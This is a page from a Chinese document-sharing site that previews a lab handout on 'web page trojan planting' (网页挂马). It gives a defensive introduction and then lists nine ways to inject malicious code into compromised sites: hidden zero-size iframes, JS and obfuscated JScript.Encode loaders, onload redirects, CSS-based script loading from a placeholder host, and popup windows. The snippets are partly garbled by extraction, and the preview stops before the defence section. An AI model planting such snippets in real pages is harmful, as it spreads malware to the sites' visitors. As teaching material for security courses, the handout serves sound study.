- 1、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。。
- 2、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载。
- 3、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
- 4、该文档为VIP文档,如果想要下载,成为VIP会员后,下载免费。
- 5、成为VIP后,下载本文档将扣除1次下载权益。下载后,不支持退款、换文档。如有疑问请联系我们。
- 6、成为VIP后,您将拥有八大权益,权益包括:VIP文档下载权益、阅读免打扰、文档格式转换、高级专利检索、专属身份标志、高级客服、多端互通、版权登记。
- 7、VIP文档为合作方或网友上传,每下载1次, 网站将根据用户上传文档的质量评分、类型等,对文档贡献者给予高额补贴、流量扶持。如果你也想贡献VIP文档。上传文档
查看更多
网页挂马编程实验
应用场景
许多软件开发人员,还没有意识到软件安全编程的重要性。安全编程不仅能提高程序的
健壮性,更重要的意义在于避免存在的漏洞被攻击和利用,特别是一些网络应用软件这方面
更应引起重视。如果软件存在溢出漏洞, 那么就可能导致一些恶意的代码被运行, 从而为黑
客敞开了大门。
服务器都可以看做是一个城堡,总是处于很多敌人的攻击之下。并且,传统战争和信息
战的历史都表明,攻击者的胜利通常不完全依赖于其技巧和智慧,往往是防守者的疏忽造成
的。作为电子王国的守护者,你面对的是很多可能造成破坏的入口,特别值得注意到有以下
几个。
软件漏洞。Web 应用程序通常使用很多技术构建而成,一般包括数据库服务器、
Web 服务器、一种或多种编程语言,所以这些运行于一个或多个操作系统之上。因此,要经
常跟踪公布的漏洞,采取必要措施,在有人利用这些漏洞之前修补问题,这是至关重要的。
用户输入。利用用户输入处理的方式,可能是对你的数据和应用造成破坏的最简
单的方法。很多大流量网站受攻击的报告都证明了这一点。通过处理经Web 表单、URL 参数、
cookie 和其他可以访问的途径传递的数据,攻击者就能攻击应用程序逻辑的核心。
未能妥善保护的数据。数据是你公司的命根子;丢失数据将至你于危险当中。数据
库和Web 账户往往未加任何防范,,或者只是用一些靠不住的口令简单地加以保护,这种情
况比比皆是。或者完全可以通过一个能轻松辨认的URL 访问基于Web 对管理应用程序。存在
这种安全隐患让人无法接受,特别是,要知道解决这些问题是如此容易,只需稍加留心就可
以轻松消除这些隐患。因为每种情况都会使应用程序的完整性处于风险之中,因此都必须进
行全面检查并做相应处理。保证服务器整体性安全。
将木马和网页结合在一起,打开网页的同时也会运行木马。黑客通过挂马入侵了一些
网站后,将自己编写的网页木马嵌入被黑网站的主页中,利用被黑网站的流量将自己的网
页木马传播开去,以达到自己的某种目的。
实验目标:
1. 了解网页挂马的基本原理
2. 了解网页挂马的常用方法
3. 网页挂马的防御
实验环境:
虚拟机,Server:Windows Server 2003, Microsoft Visual Studio 2005 ,IE6.0
实验过程指导:
1. 网页挂马的方法介绍
(1) 框架挂马
iframe src=地址 width=0 height=0/iframe
(2 ) js 文件挂马
首先将以下代码:
document.write(iframe width= ‘0 height= ‘0 src= ‘地址/iframe);
保存为xxx.js ,
则JS 挂马代码为script language=javascript src=xxx.js/script
(3 ) js 变形加密
script language=JScript.Encode
src=/muma.txt/script
muma.txt 可改成任意后缀
(4 ) body 挂马
body onload=window.location=地址;/body
(5 ) 隐蔽挂马
top.document.body.innerHTML = top.document.body.innerHTML + ‘ \r\niframe
src=/muma.htm//iframe;
(6 ) css 中挂马
Body
{background-image:url(‘javascript:document.write(script
src=http://www.XXX.net/muma.js/script))}
(7 ) JAVA 挂马
SCRIPT language=javascriptwindow.open(地址,,toolbar=no,location=no,directories=no,
status=no,menubar=no,scro llbars=no,width=1,height=1); /script
(8 ) 图片伪装
html
iframe src= 网马地址 height=0 width=0/iframeimg src= 图片地址/center/html
(9 ) 伪装调用:
frames
您可能关注的文档
- 圆厅别墅分析.doc
- 五一劳动节主题班会__PPT课件17092.ppt
- 雷顿教授与不可思议小镇详细攻略 上.doc
- 适合送给妈妈的礼物.pdf
- 实验5:因子分析.pdf
- 一元一次不等式易错题1-(含答案).doc
- 燃气加热炉热效率计算方法的改进及应用_梁光川.pdf
- 经济数学(函数习题及答案).pdf
- 摭谈英语教材的文本再构.pdf
- 苏州科技过控复习题.doc
- 浙江省平阳中学2025-2026学年高三上学期8月开学考地理试题 Word版无答案.docx
- 浙江省七彩阳光新高考研究联盟2025-2026学年高三上学期返校联考历史试题 Word版无答案.docx
- 浙江省Z20名校联盟(名校新高考研究联盟)2025-2026学年高三上学期第一次联考历史试卷 Word版无答案.docx
- 浙江省七彩阳光新高考研究联盟2025-2026学年高三上学期返校联考物理试题 Word版无答案.docx
- 单元总结提升.pptx
- 第22课 从局部抗战到全国抗战(练习,含解析).docx
- 浙江省强基联盟2025-2026学年高三8月联考语文试题 Word版无答案.docx
- 2024土工合成材料塑料土工格室.pdf
- 第23课 全民族浴血奋战与抗日战争的胜利.pptx
- 第23课 全民族浴血奋战与抗日战争的胜利.docx
文档评论(0)